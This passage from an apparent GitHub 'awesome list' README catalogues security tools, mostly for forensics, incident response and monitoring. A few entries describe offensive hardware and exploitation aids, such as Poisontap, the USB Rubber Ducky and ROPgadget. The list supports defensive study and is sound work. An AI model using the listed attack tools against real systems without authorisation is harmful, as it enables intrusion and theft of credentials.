  • Belkasoft Live RAM Capturer - A tiny free forensic tool to reliably extract the entire content of the computer’s volatile memory – even if protected by an active anti-debugging or anti-dumping system.
  • Linux Memory Grabber - A script for dumping Linux memory and creating Volatility profiles.
  • Magnet RAM Capture - Magnet RAM Capture is a free imaging tool designed to capture the physical memory of a suspect’s computer. Supports recent versions of Windows.
  • OSForensics - OSForensics can acquire live memory on 32bit and 64bit systems. A dump of an individual process’s memory space or physical memory dump can be done.

Incident Response

Honeypot Tools

Monitoring and IDS-IPS

  • Security Onion - Linux distro for monitoring.
  • Snort - Open source NIPS/NIDS.
  • OSSEC - Open source HIDS.
  • AIEngine - Very advanced NIDS.
  • Suricata - Open source NIPS/NIDS.
  • SSHWATCH - SSH IPS.
  • Elastic Stack - Also known as the ELK stack, the combination of Elasticsearch, Logstash, and Kibana, for monitoring and logging.

Physical Tools

  • LAN Turtle - Covert "USB Ethernet Adapter" that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network.
  • USB Rubber Ducky - Customizable keystroke injection attack platform masquerading as a USB thumbdrive.
  • Poisontap - Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers.
  • WiFi Pineapple - Wireless auditing and penetration testing platform.
  • Proxmark3 - RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more.
  • PCILeech - Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe.

Adversary Emulation

  • APTSimulator - A Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.
  • Atomic Red Team](https://github.com/redcanaryco/atomic-red-team) - Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.
  • AutoTTP - Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers.
  • Blue Team Training Toolkit](https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level.
  • Caldera - an automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge](ATT&CK™) project.
  • DumpsterFire - The DumpsterFire Toolset is a modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations.
  • Metta - An information security preparedness tool to do adversarial simulation.
  • Network Flight Simulator - flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.
  • Red Team Automation ](https://github.com/endgameinc/RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.
  • RedHunt-OS - A virtual machine for adversary emulation and threat hunting.

All in one Incident Response Tools

  • Belkasoft Evidence Center - The toolkit will quickly extract digital evidence from multiple sources by analyzing hard drives, drive images, memory dumps, iOS, Blackberry and Android backups, UFED, JTAG and chip-off dumps.
  • CimSweep - CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows.
  • CIRTkit - CIRTKit is not just a collection of tools, but also a framework to aid in the ongoing unification of Incident Response and Forensics investigation processes.
  • Cyber Triage - Cyber Triage remotely collects and analyzes endpoint data to help determine if it is compromised. It’s agentless approach and focus on ease of use and automation allows companies to respond without major infrastructure changes and without a team of forensics experts. Its results are used to decide if the system should be erased or investigated further.
  • Digital Forensics Framework - DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface. DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation so it can be used by both professional and non-expert to quickly and easily conduct a digital investigations and perform incident response.
  • Doorman - Doorman is an osquery fleet manager that allows remote management of osquery configurations retrieved by nodes. It takes advantage of osquery's TLS configuration, logger, and distributed read/write endpoints, to give administrators visibility across a fleet of devices with minimal overhead and intrusiveness.
  • Envdb - Envdb turns your production, dev, cloud, etc environments into a database cluster you can search using osquery as the foundation. It wraps the osquery process with a cluster node agent that can communicate back to a central location.
  • Falcon Orchestrator - Falcon Orchestrator by CrowdStrike is an extendable Windows-based application that provides workflow automation, case management and security response functionality.
  • GRR Rapid Response - GRR Rapid Response is an incident response framework focused on remote live forensics. It consists of a python agent client that is installed on target systems, and a python server infrastructure that can manage and talk to the agent.
  • Kolide Fleet - Kolide Fleet is a state of the art host monitoring platform tailored for security experts. Leveraging Facebook's battle-tested osquery project, Kolide delivers fast answers to big questions.
  • Limacharlie - an endpoint security platform. It is itself a collection of small projects all working together, and gives you a cross-platform, Windows, OSX, Linux, Android and iOS, low-level environment allowing you to manage and push additional modules into memory to extend its functionality.
  • MIG - Mozilla Investigator, MIG, is a platform to perform investigative surgery on remote endpoints. It enables investigators to obtain information from large numbers of systems in parallel, thus accelerating investigation of incidents and day-to-day operations security.
  • MozDef - The Mozilla Defense Platform, MozDef, seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers.
  • nightHawk - the nightHawk Response Platform is an application built for asynchronus forensic data presentation using ElasticSearch as the backend. It's designed to ingest Redline collections.
  • Open Computer Forensics Architecture - Open Computer Forensics Architecture, OCFA, is another popular distributed open-source computer forensics framework. This framework was built on Linux platform and uses postgreSQL database for storing data.
  • Osquery - with osquery you can easily ask questions about your Linux and OSX infrastructure. Whether your goal is intrusion detection, infrastructure reliability, or compliance, osquery gives you the ability to empower and inform a broad set of organizations within your company. Queries in the -incident-response pack - help you detect and respond to breaches.
  • Redline - provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile.
  • The Sleuth Kit & Autopsy - The Sleuth Kit is a Unix and Windows based tool which helps in forensic analysis of computers. It comes with various tools which helps in digital forensics. These tools help in analyzing disk images, performing in-depth analysis of file systems, and various other things.
  • TheHive - TheHive is a scalable 3-in-1 open source and free solution designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly.
  • X-Ways Forensics - X-Ways is a forensics tool for Disk cloning and imaging. It can be used to find deleted files and disk analysis.
  • Zentral - combines osquery's powerful endpoint inventory features with a flexible notification and action framework. This enables one to identify and react to changes on OS X and Linux clients.

Disk Image Creation Tools

  • AccessData FTK Imager - AccessData FTK Imager is a forensics tool whose main purpose is to preview recoverable data from a disk of any kind. FTK Imager can also acquire live memory and paging file on 32bit and 64bit systems.
  • Bitscout - Bitscout by Vitaly Kamluk helps you build your fully-trusted customizable LiveCD/LiveUSB image to be used for remote digital forensics, or perhaps any other task of your choice. It is meant to be transparent and monitorable by the owner of the system, forensically sound, customizable and compact.
  • GetData Forensic Imager - GetData Forensic Imager is a Windows based program that will acquire, convert, or verify a forensic image in one of the following common forensic file formats.
  • Guymager - Guymager is a free forensic imager for media acquisition on Linux.
  • Magnet ACQUIRE - ACQUIRE by Magnet Forensics allows various types of disk acquisitions to be performed on Windows, Linux, and OS X as well as mobile operating systems.

Evidence Collection Tools

  • Bulk_extractor - bulk_extractor is a computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the file system or file system structures. Because of ignoring the file system structure, the program distinguishes itself in terms of speed and thoroughness.
  • Cold Disk Quick Response - uses a streamlined list of parsers to quickly analyze a forenisic image file, dd, E01, .vmdk, etc, and output nine reports.
  • Ir-rescue - -ir-rescue - is a Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response.
  • Live Response Collection - The Live Response collection by BriMor Labs is an automated tool that collects volatile data from Windows, OSX, and -nix based operating systems.

Incident Management Tools

  • CyberCPR - A community and commercial incident management tool with Need-to-Know built in to support GDPR compliance while handling sensitive incidents.
  • Cyphon - Cyphon eliminates the headaches of incident management by streamlining a multitude of related tasks through a single platform. It receives, processes and triages events to provide an all-encompassing solution for your analytic workflow — aggregating data, bundling and prioritizing alerts, and empowering analysts to investigate and document incidents.
  • Demisto - Demisto community edition offers full Incident lifecycle management, Incident Closure Reports, team assignments and collaboration, and many integrations to enhance automations, like Active Directory, PagerDuty, Jira and much more.
  • FIR - Fast Incident Response, FIR, is an cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents and is useful for CSIRTs, CERTs and SOCs alike.
  • RTIR - Request Tracker for Incident Response, RTIR, is the premier open source incident handling system targeted for computer security teams. We worked with over a dozen CERT and CSIRT teams around the world to help you handle the ever-increasing volume of incident reports. RTIR builds on all the features of Request Tracker.
  • SCOT - Sandia Cyber Omni Tracker, SCOT, is an Incident Response collaboration and knowledge capture tool focused on flexibility and ease of use. Our goal is to add value to the incident response process without burdening the user.
  • Threat_note - A lightweight investigation notebook that allows security researchers the ability to register and retrieve indicators related to their research.

Linux Forensics Distributions

  • ADIA - The Appliance for Digital Investigation and Analysis, ADIA, is a VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 32-bit and x86_64 versions are available.
  • CAINE - The Computer Aided Investigative Environment, CAINE, contains numerous tools that help investigators during their analysis, including forensic evidence collection.
  • CCF-VM - CyLR CDQR Forensics Virtual Machine, CCF-VM: An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously.
  • DEFT - The Digital Evidence & Forensics Toolkit, DEFT, is a Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit, DART, for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.
  • NST - Network Security Toolkit - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.
  • PALADIN - PALADIN is a modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included.
  • Security Onion - Security Onion is a special Linux distro aimed at network security monitoring featuring advanced analysis tools.
  • SIFT Workstation - The SANS Investigative Forensic Toolkit, SIFT, Workstation demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.

Linux Evidence Collection

  • FastIR Collector Linux - FastIR for Linux collects different artefacts on live Linux and records the results in csv files.

Log Analysis Tools

  • Lorg - a tool for advanced HTTPD logfile security analysis and forensics.
  • Logdissect - A CLI utility and Python API for analyzing log files and other data.

OSX Evidence Collection

  • Knockknock - Displays persistent items, scripts, commands, binaries, etc., that are set to execute automatically on OSX.
  • Mac_apt - macOS Artifact Parsing Tool - Plugin based forensics framework for quick mac triage that works on live machines, disk images or individual artifact files.
  • OSX Auditor - OSX Auditor is a free Mac OS X computer forensics tool.
  • OSX Collector - An OSX Auditor offshoot for live response.

Incident Response Playbooks

  • IRM - Incident Response Methodologies by CERT Societe Generale.
  • IR Workflow Gallery - Different generic incident response workflows, e.g. for malware outbreak, data theft, unauthorized access,... Every workflow constists of seven steps: prepare, detect, analyze, contain, eradicate, recover, post-incident handling.
  • PagerDuty Incident Response Documentation - Documents that describe parts of the PagerDuty Incident Response process. It provides information not only on preparing for an incident, but also what to do during and after.

Process Dump Tools

  • Microsoft User Mode Process Dumper - The User Mode Process Dumper, userdump, dumps any running Win32 processes memory image on the fly.
  • PMDump - PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.

Sandboxing/reversing tools

  • Cuckoo - Open Source Highly configurable sandboxing tool.
  • Cuckoo-modified - Heavily modified Cuckoo fork developed by community.
  • Cuckoo-modified-api - A Python library to control a cuckoo-modified sandbox.
  • Hybrid-Analysis - Hybrid-Analysis is a free powerful online sandbox by Payload Security.
  • Malwr - Malwr is a free online malware analysis service and community, which is powered by the Cuckoo Sandbox.
  • Mastiff - MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats.
  • Metadefender Cloud - Metadefender is a free threat intelligence platform providing multiscanning, data sanitization and vulnerability assesment of files.
  • Viper - Viper is a python based binary analysis and management framework, that works well with Cuckoo and YARA
  • Virustotal - Virustotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners.
  • Visualize_Logs - Open source. Visualization library and command line tools for logs.

Timeline tools

  • Highlighter - Free Tool available from Fire/Mandiant that will depict log/text file that can highlight areas on the graphic, that corresponded to a key word or phrase. Good for time lining an infection and what was done post compromise.
  • Morgue - A PHP Web app by Etsy for managing postmortems.
  • Plaso - a Python-based backend engine for the tool log2timeline.
  • Timesketch - open source tool for collaborative forensic timeline analysis.

Windows Evidence Collection

  • AChoir - Achoir is a framework/scripting tool to standardize and simplify the process of scripting live acquisition utilities for Windows.
  • Binaryforay - list of free tools for win forensics.
  • Crowd Response - Crowd Response by CrowdStrike is a lightweight Windows console application designed to aid in the gathering of system information for incident response and security engagements. It features numerous modules and output formats.
  • FastIR Collector - FastIR Collector is a tool that collects different artefacts on live Windows systems and records the results in csv files. With the analyses of these artefacts, an early compromise can be detected.
  • FECT - Fast Evidence Collector Toolkit, FECT, is a light incident response toolkit to collect evidences on a suspicious Windows computer. Basically it is intended to be used by non-tech savvy people working with a journeyman Incident Handler.
  • Fibratus - tool for exploration and tracing of the Windows kernel.
  • IREC - All-in-one IR Evidence Collector which captures RAM Image, $MFT, EventLogs, WMI Scripts, Registry Hives, System Restore Points and much more. It is FREE, lightning fast and easy to use.
  • IOC Finder - IOC Finder is a free tool from Mandiant for collecting host system data and reporting the presence of Indicators of Compromise. Support for Windows only.
  • Fidelis ThreatScanner - Fidelis ThreatScanner is a free tool from Fidelis Cybersecurity that uses OpenIOC and YARA rules to report on the state of an endpoint. The user provides OpenIOC and YARA rules and executes the tool. ThreatScanner measures the state of the system and, when the run is complete, a report for any matching rules is generated. Windows Only.
  • LOKI - Loki is a free IR scanner for scanning endpoint with yara rules and other indicators.
  • Panorama - Fast incident overview on live Windows systems.
  • PowerForensics - Live disk forensics platform, using PowerShell.
  • PSRecon - PSRecon gathers data from a remote Windows host using PowerShell](v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally.
  • RegRipper - Regripper is an open source tool, written in Perl, for extracting/parsing information, keys, values, and data from the Registry and presenting it for analysis.
  • TRIAGE-IR - Triage-IR is a IR collector for Windows.

Other

  • Kayak Car Hacking Tool - Tool for Kayak car hacking.
  • ROPgadget - Python based tool to aid in ROP exploitation.
  • Shellen - Interactive shellcoding environment.
  • Netzob - Multipurpose tool for reverse engineering, modeling, and fuzzing communciation protocols.
  • Sulley - Fuzzing engine and framework.
  • Zulu - Interactive fuzzer.
  • honggfuzz - Security orientated fuzzing tool.
  • radamsa - General purpose fuzzing tool.
  • fuzzbox - Multi-codec media fuzzing tool.
  • melkor-android - Android fuzzing tool for ELF file formats.
  • BruteX Wordlists - Wordlist repo.
  • Google Hacking Master List
  • Cortex - Cortex allows you to analyze observables such as IP and email addresses, URLs, domain names, files or hashes one by one or in bulk mode using a Web interface. Analysts can also automate these operations using its REST API.
  • Crits - a web-based tool which combines an analytic engine with a cyber threat database .
  • Diffy - a DFIR tool developed by Netflix's SIRT that allows an investigator to quickly scope a compromise across cloud instances (Linux instances on AWS, currently) during an incident and efficiently triaging those instances for followup actions by showing differences against a baseline.
  • domfind - domfind is a Python DNS crawler for finding identical domain names under different TLDs.
  • Fenrir - Fenrir is a simple IOC scanner. It allows scanning any Linux/Unix/OSX system for IOCs in plain bash. Created by the creators of THOR and LOKI.
  • Fileintel - Pull intelligence per file hash.
  • HELK - Threat Hunting platform.
  • Hindsight - Internet history forensics for Google Chrome/Chromium.
  • Hostintel - Pull intelligence per host.
  • imagemounter - Command line utility and Python package to ease the (un)mounting of forensic disk images.
  • Kansa - Kansa is a modular incident response framework in Powershell.
  • rastrea2r - allows one to scan disks and memory for IOCs using YARA on Windows, Linux and OS X.
  • RaQet - RaQet is an unconventional remote acquisition and triaging tool that allows triage a disk of a remote computer (client) that is restarted with a purposely built forensic operating system.
  • Stalk - Collect forensic data about MySQL when problems occur.
  • SearchGiant - a commandline utility to acquire forensic data from cloud services.
  • Stenographer - Stenographer is a packet capture solution which aims to quickly spool all packets to disk, then provide simple, fast access to subsets of those packets. It stores as much history as it possible, managing disk usage, and deleting when disk limits are hit. It's ideal for capturing the traffic just before and during an incident, without the need explicit need to store all of the network traffic.
  • sqhunter - a threat hunter based on osquery and Salt Open (SaltStack) that can issue ad-hoc or distributed queries without the need for osquery's tls plugin. sqhunter allows you to query open network sockets and check them against threat intelligence sources.
  • traceroute-circl - traceroute-circl is an extended traceroute to support the activities of CSIRT (or CERT) operators. Usually CSIRT team have to handle incidents based on IP addresses received. Created by Computer Emergency Responce Center Luxembourg.

Our Reports

Our Open Source Tools

  • Legion - Legion is an open source, easy-to-use, super-extensible and semi-automated network penetration testing tool that aids in discovery, reconnaissance and exploitation of information systems.
  • Spearhead - Private repo containing just the whitelabel components for defectDojo, also known as Spearhead.

License

CC-BY

This work is licensed under a Creative Commons Attribution 4.0 International License.

About

A list of information security related awesome lists and other resources.

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published